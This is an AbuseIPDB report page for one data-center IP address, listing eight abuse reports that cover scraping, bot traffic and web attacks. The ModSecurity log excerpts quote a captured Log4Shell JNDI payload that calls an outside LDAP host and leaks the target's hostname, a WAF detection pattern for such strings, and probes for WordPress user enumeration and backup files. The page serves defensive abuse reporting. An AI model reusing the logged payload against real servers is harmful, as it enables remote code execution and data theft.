JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 206.206.73.67

206.206.73.67 was found in our database!

This IP was reported 8 times. Confidence of Abuse is 17%: ?

17%

ISP	Colocation America Corporation
Usage Type	Data Center/Web Hosting/Transit
ASN	AS13332
Domain Name	colocationamerica.com
Country	🇺🇸 United States of America
City	Santa Monica, California

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 206.206.73.67

Whois 206.206.73.67

IP Abuse Reports for 206.206.73.67:

This IP address has been reported a total of 8 times from 6 distinct sources. 206.206.73.67 was first reported on March 31st 2025, and the most recent report was 3 weeks ago.

Old Reports: The most recent abuse report for this IP address is from 3 weeks ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
Anonymous	2026-06-01 18:30:06 (3 weeks ago)	\| A web attack returned code 200 (success).	Web App Attack Hacking SQL Injection
🇫🇷 bigorre.org	2026-05-31 11:29:51 (3 weeks ago)	Excessive crawling : exceed crawl-delay defined in robots.txt	Bad Web Bot
Anonymous	2026-05-10 06:05:57 (1 month ago)	Distributed web crawl botnet attack (like Mellowtel), likely illicit scraping of AI training data to ... show more Distributed web crawl botnet attack (like Mellowtel), likely illicit scraping of AI training data to bypass firewall/robots.txt restrictions in email-link.asp show less	Exploited Host Bad Web Bot
🇳🇱 Roderic	2026-05-08 22:21:23 (1 month ago)	(apache-useragents) Failed apache-useragents trigger with match [redacted])	Bad Web Bot
🇺🇸 TPI-Abuse	2025-12-01 04:12:45 (6 months ago)	(mod_security) mod_security (id:225170) triggered by 206.206.73.67 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:225170) triggered by 206.206.73.67 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Nov 30 23:12:37.607728 2025] [security2:error] [pid 15815:tid 15821] [client 206.206.73.67:58893] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)\|\|staging.kettlehill.com\|F\|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "staging.kettlehill.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aS0Vta_p03yqBkZoSFT85AAAAAM"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-11-01 15:47:22 (7 months ago)	(mod_security) mod_security (id:210730) triggered by 206.206.73.67 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:210730) triggered by 206.206.73.67 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Nov 01 11:47:15.540255 2025] [security2:error] [pid 27531:tid 27555] [client 206.206.73.67:40627] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy\|\|www.staging.kettlehill.com\|F\|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "staging.kettlehill.com"] [uri "/default.php.bak"] [unique_id "aQYrg32WO2IkxYJ6zsIb6wAAARY"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-06-01 13:40:13 (1 year ago)	(mod_security) mod_security (id:248270) triggered by 206.206.73.67 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:248270) triggered by 206.206.73.67 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Jun 01 09:40:01.774137 2025] [security2:error] [pid 2844918:tid 2844918] [client 206.206.73.67:55263] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\$\\\\{jndi:(ldaps?\|rmi\|dns\|iiop\|nis\|nds\|corba\|\\\\$\\\\{(?:lower\|upper)):" at REQUEST_HEADERS:Accept. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j\|\|nbcnewsradio.com\|F\|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "nbcnewsradio.com"] [uri "/"] [unique_id "aDxYMXwa9ySILj8B6wMckQAAAAM"], referer: ${jndi:ldap://${:-259}${:-846}.${hostName}.referer.d0u5g0s5d8ie5lt5mp20e197ot98zyc6r.rsfi.info} show less	Brute-Force Bad Web Bot Web App Attack
🇨🇭 backslash	2025-03-31 00:00:25 (1 year ago)	block ruleset CC531825F9395F9A07FB06C1247C46770A2690F8	Bad Web Bot

Showing 1 to 8 of 8 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇧🇷 201.71.192.108

🇹🇭 118.193.57.62

🇮🇷 195.181.37.197

🇭🇰 123.58.213.128

🇺🇸 104.207.37.99

🇬🇧 81.19.219.208

🇺🇸 66.132.224.15

🇩🇪 65.111.22.110

🇲🇾 49.124.147.118

🇳🇱 45.148.10.151

🇸🇬 43.156.12.237

🇺🇸 147.185.132.144

🇧🇹 119.2.112.142

🇬🇧 87.106.44.172

🇺🇸 64.23.214.73

🇱🇹 45.227.254.170

🇧🇷 207.248.16.7

🇺🇸 207.90.244.21

🇺🇸 195.184.76.174

🇵🇱 194.180.48.33